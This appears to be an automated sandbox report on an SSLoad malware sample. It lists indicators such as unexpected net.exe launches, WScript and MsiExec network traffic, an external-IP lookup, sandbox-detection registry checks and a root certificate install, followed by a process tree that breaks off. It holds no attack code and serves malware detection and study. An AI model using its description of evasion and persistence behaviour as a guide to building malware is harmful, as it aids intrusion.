Analysis
max time kernel: 285s
max time network: 283s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 13-05-2024 13:08
Static task: static1
URLScan task: urlscan1
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2060 | 4648 | net.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 460 | 4648 | net.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5024 | 4648 | net.exe
-
Detects SSLoad Unpacked payload 1 IoCs
Processes:
resource | yara_rule
behavioral1/memory/1952-291-0x0000000003530000-0x00000000035A3000-memory.dmp | family_ssload
-
Blocklisted process makes network request 4 IoCs
Processes:
flow | pid | process
46 | 3452 | WScript.exe
48 | 3452 | WScript.exe
59 | 1952 | MsiExec.exe
61 | 1952 | MsiExec.exe
-
Loads dropped DLL 15 IoCs
Processes:
pid | process
3736 | MsiExec.exe
3736 | MsiExec.exe
3736 | MsiExec.exe
3736 | MsiExec.exe
3736 | MsiExec.exe
3736 | MsiExec.exe
5088 | MsiExec.exe
5088 | MsiExec.exe
5088 | MsiExec.exe
5088 | MsiExec.exe
5088 | MsiExec.exe
5088 | MsiExec.exe
1952 | MsiExec.exe
1952 | MsiExec.exe
1952 | MsiExec.exe
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\X: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\G: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\U: | msiexec.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\V: | msiexec.exe
File opened (read-only) | \??\S: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\B: | msiexec.exe
File opened (read-only) | \??\M: | msiexec.exe
File opened (read-only) | \??\T: | msiexec.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\P: | msiexec.exe
File opened (read-only) | \??\H: | msiexec.exe
File opened (read-only) | \??\K: | msiexec.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\J: | msiexec.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\Q: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
58 | api.ipify.org
59 | api.ipify.org
-
Drops file in Windows directory 9 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\Installer\MSI8CC1.tmp | msiexec.exe
File created | C:\Windows\Installer\SourceHash{52EF198D-0C6C-406A-803F-F86D93DD7930} | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8D5F.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\e5a8be6.msi | msiexec.exe
File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | msiexec.exe
File opened for modification | C:\Windows\Installer\MSI8C34.tmp | msiexec.exe
File opened for modification | C:\Windows\Installer\ | msiexec.exe
File created | C:\Windows\Installer\inprogressinstallinfo.ipi | msiexec.exe
File created | C:\Windows\Installer\e5a8be6.msi | msiexec.exe
-
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Checks SCSI registry key(s) 3 TTPs 8 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr | vssvc.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = (value omitted) | vssvc.exe
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | vssvc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | vssvc.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters | vssvc.exe
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
-
Modifies registry class 2 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings\MuiCache | StartMenuExperienceHost.exe
-
Processes:
description | ioc | process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = (value omitted) | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | WScript.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = (certificate blob omitted) | WScript.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = (value omitted) | WScript.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 | WScript.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = (certificate blob omitted) | WScript.exe
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
pid | process
1796 | msedge.exe
1796 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4476 | identity_helper.exe
4476 | identity_helper.exe
4856 | msedge.exe
4856 | msedge.exe
4212 | msiexec.exe
4212 | msiexec.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid | process
3316 | 7zFM.exe
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
Processes:
pid | process
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
description | pid | process
Token: SeRestorePrivilege | 3316 | 7zFM.exe
Token: 35 | 3316 | 7zFM.exe
Token: SeSecurityPrivilege | 3316 | 7zFM.exe
Token: SeShutdownPrivilege | 3080 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 3080 | msiexec.exe
Token: SeSecurityPrivilege | 4212 | msiexec.exe
Token: SeCreateTokenPrivilege | 3080 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 3080 | msiexec.exe
Token: SeLockMemoryPrivilege | 3080 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 3080 | msiexec.exe
Token: SeMachineAccountPrivilege | 3080 | msiexec.exe
Token: SeTcbPrivilege | 3080 | msiexec.exe
Token: SeSecurityPrivilege | 3080 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3080 | msiexec.exe
Token: SeLoadDriverPrivilege | 3080 | msiexec.exe
Token: SeSystemProfilePrivilege | 3080 | msiexec.exe
Token: SeSystemtimePrivilege | 3080 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 3080 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 3080 | msiexec.exe
Token: SeCreatePagefilePrivilege | 3080 | msiexec.exe
Token: SeCreatePermanentPrivilege | 3080 | msiexec.exe
Token: SeBackupPrivilege | 3080 | msiexec.exe
Token: SeRestorePrivilege | 3080 | msiexec.exe
Token: SeShutdownPrivilege | 3080 | msiexec.exe
Token: SeDebugPrivilege | 3080 | msiexec.exe
Token: SeAuditPrivilege | 3080 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 3080 | msiexec.exe
Token: SeChangeNotifyPrivilege | 3080 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 3080 | msiexec.exe
Token: SeUndockPrivilege | 3080 | msiexec.exe
Token: SeSyncAgentPrivilege | 3080 | msiexec.exe
Token: SeEnableDelegationPrivilege | 3080 | msiexec.exe
Token: SeManageVolumePrivilege | 3080 | msiexec.exe
Token: SeImpersonatePrivilege | 3080 | msiexec.exe
Token: SeCreateGlobalPrivilege | 3080 | msiexec.exe
Token: SeCreateTokenPrivilege | 3080 | msiexec.exe
Token: SeAssignPrimaryTokenPrivilege | 3080 | msiexec.exe
Token: SeLockMemoryPrivilege | 3080 | msiexec.exe
Token: SeIncreaseQuotaPrivilege | 3080 | msiexec.exe
Token: SeMachineAccountPrivilege | 3080 | msiexec.exe
Token: SeTcbPrivilege | 3080 | msiexec.exe
Token: SeSecurityPrivilege | 3080 | msiexec.exe
Token: SeTakeOwnershipPrivilege | 3080 | msiexec.exe
Token: SeLoadDriverPrivilege | 3080 | msiexec.exe
Token: SeSystemProfilePrivilege | 3080 | msiexec.exe
Token: SeSystemtimePrivilege | 3080 | msiexec.exe
Token: SeProfSingleProcessPrivilege | 3080 | msiexec.exe
Token: SeIncBasePriorityPrivilege | 3080 | msiexec.exe
Token: SeCreatePagefilePrivilege | 3080 | msiexec.exe
Token: SeCreatePermanentPrivilege | 3080 | msiexec.exe
Token: SeBackupPrivilege | 3080 | msiexec.exe
Token: SeRestorePrivilege | 3080 | msiexec.exe
Token: SeShutdownPrivilege | 3080 | msiexec.exe
Token: SeDebugPrivilege | 3080 | msiexec.exe
Token: SeAuditPrivilege | 3080 | msiexec.exe
Token: SeSystemEnvironmentPrivilege | 3080 | msiexec.exe
Token: SeChangeNotifyPrivilege | 3080 | msiexec.exe
Token: SeRemoteShutdownPrivilege | 3080 | msiexec.exe
Token: SeUndockPrivilege | 3080 | msiexec.exe
Token: SeSyncAgentPrivilege | 3080 | msiexec.exe
Token: SeEnableDelegationPrivilege | 3080 | msiexec.exe
Token: SeManageVolumePrivilege | 3080 | msiexec.exe
Token: SeImpersonatePrivilege | 3080 | msiexec.exe
Token: SeCreateGlobalPrivilege | 3080 | msiexec.exe
-
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
pid | process
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
3316 | 7zFM.exe
4628 | msedge.exe
3316 | 7zFM.exe
3316 | 7zFM.exe
3080 | msiexec.exe
3444 | msiexec.exe
3444 | msiexec.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
-
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
pid | process
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
4628 | msedge.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
2408 | taskmgr.exe
-
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
pid | process
3748 | StartMenuExperienceHost.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 4628 wrote to memory of 1408 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1408 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1680 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1796 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1796 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
PID 4628 wrote to memory of 1000 | 4628 | msedge.exe | msedge.exe
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://malware-traffic-analysis.net/2024/04/17/2024-04-17-SSLoad-malware-and-artifacts.zip
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4628
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9428a46f8,0x7ff9428a4708,0x7ff9428a4718
  PID:1408
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
  PID:1680
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
  - Suspicious behavior: EnumeratesProcesses
  PID:1796
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2924 /prefetch:8
  PID:1000
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:1
  PID:2564
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3368 /prefetch:1
  PID:3460
-
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
  PID:1672
-
  C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5424 /prefetch:8
  - Suspicious behavior: EnumeratesProcesses
  PID:4476
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1
  PID:1448
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1
  PID:4492
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,1239402992837740920,13210006413230418402,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5184 /prefetch:8
  PID:1420
-
  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
